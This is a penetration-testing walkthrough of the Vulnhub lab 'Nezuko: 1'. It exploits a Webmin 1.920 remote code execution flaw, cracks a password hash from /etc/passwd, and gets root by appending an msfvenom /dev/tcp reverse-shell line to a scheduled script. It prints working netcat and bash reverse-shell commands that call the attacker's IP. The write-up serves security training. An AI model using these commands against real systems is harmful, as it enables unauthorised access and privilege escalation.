Nezuko: 1 Vulnhub Walkthrough
Today we are going to solve another CTF challenge called “Nezuko: 1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to yunaranyancat. Let’s start and learn how to successfully breach it.
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.
Penetration Testing Methodology
- Browsing HTTP Service
- Browsing Webmin Service
- Enumerating Webmin Service
- Exploiting Remote Code Execution Vulnerability
- Get Shell
- Enumerate for Flag
- Readable /etc/passwd file
- Cracking hash using John The Ripper
- Creating reverse bash script using msfvenom
- Editing script scheduled to autorun
- Get Escalated Shell
- Enumerate for flag
Capture the flag
We will be running this lab in a Virtual Machine Player or Virtual Box. After running the lab, we used the netdiscover command to check the IP Address of the lab.
This was found out to be 192.168.1.105.
Now we will run an aggressive scan using nmap for proceed further.
nmap -p- -A 192.168.1.105
From its result, we found ports 22(SSH), 80(HTTP), 13337(MiniServ) were open.
For more detail, we will be needing to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service.
We obtained an image of Nezuko anime character as shown in the given below image.
This webpage turned out to be a waste of time as we were not being able to extract anything from here. It’s time to explore other ports. Next one in our port scan was 13337. So we browsed to that port and it gave us the login panel of Webmin as shown in the image.
As we were not able to get out hands on credentials in our initial enumeration. We will have to figure out a different way to get through this Authorization Login Panel of Webmin. In our initial port scan, we figured out that our target machine is running the Webmin Version 1.920. So we used the searchsploit to search for any available exploits.
searchsploit Webmin 1.920
This gave us the Remote Code Execution(RCE) Exploit. Now let’s download this exploit script using the -m parameter of the searchsploit command.
searchsploit -m 47293
Now let’s read the contents of the exploit as well understand the usage of the exploit.
We saw that the exploit checks the Vulnerability through the RCE and returns the arguments “Vulnerable “or “Target is not Vulnerable”. But we want to gain a remote shell on target system. So we modified the exploit script to generate a netcat session from the target machine as shown in the image. We renamed the file to “shell.sh” as it is easier to remember than “47293”.
nano shell.sh nc -e /bin/bash [Attacker IP] [Port]
Here, we have the IP Address of our Attacker Machine (Kali Linux) is 192.168.1.106
Now, let’s execute the shell script with the target IP address and Port as parameters. But before executing this shell script, we will initiate a netcat listener to receive the reverse shell.
sh shell.sh https://192.168.1.105:13337
We started this netcat listener as discussed earlier. And as the shell script was executed we got an improper shell of the target machine. We used the python one-line to convert it into a proper shell.
nc -lvp 1337 python3 -c 'import pty;pty.spawn("/bin/bash")'
We can see that we have got the shell as the user Nezuko. We enumerated further using the ls command. This gave us that we have a directory named “from_zenitsu” as well as a text file named nezuko.txt. When we further investigated we saw that a message is received every 5 minutes. As the directory is named “from_zenitsu”, we assumed that there must be a user by that name.
cd ls cd from_zenitsu ls
But let’s also open the nezukto.txt file. It is our first flag. Now we will have to escalate privilege on this machine.
We were looking for a user named zenitsu, so we thought to check if the /etc/passwd file is readable or not. It was readable. And we found a user named zenitsu as shown in the given image.
We used John The Ripper to crack the password hash of the user zenitsu. As shown in the image, it is “meowmeow”.
john hash --show
Now, as we have the credentials of the user zenitsu, let’s traverse to that user.
We entered the password “meowmeow” as shown in the image.
cd ls cd to_nezuko ls –la send_message_to_nezuko.sh
Now it’s time to enumerate this user as well. Here, on close inspection, we found a directory named “to_nezuko”. In this directory, we found the script that sends those messages to nezuko. We checked the permission of the script and found out that it runs with elevated privileges.
Now we created a reverse bash shell using the msfvenom, as shown in the given image to get a root shell on the target machine. We choose the format of payload to be Raw. We did this so that we can have the script available to us as shown in the given image.
msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.106 lport=1234 R
We used the echo command as the zenitsu user, to edit the send_message_to_nezuko.sh file. We altered our shell code in the script. Now as we observed earlier, this script gets executed every 5 minutes. So we will wait for it to execute.
echo "0<&60-;exec 60<>/dev/tcp/192.168.1.106/1234;sh <&60 >&60 2>&60" >> send_message_to_nezuko.sh
In order to receive the shell, we started a netcat listener on the port that we mentioned while creating the payload. And after waiting for 5 minutes, we have the shell, here we found the root.txt. This was our final flag.
nc -lvp 1234 id cd /root ls cat root.txt
This was a good lab that made us understand some important aspects of scheduled tasks between users on the same machine. As well as to exploit a Webmin Panel.
Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here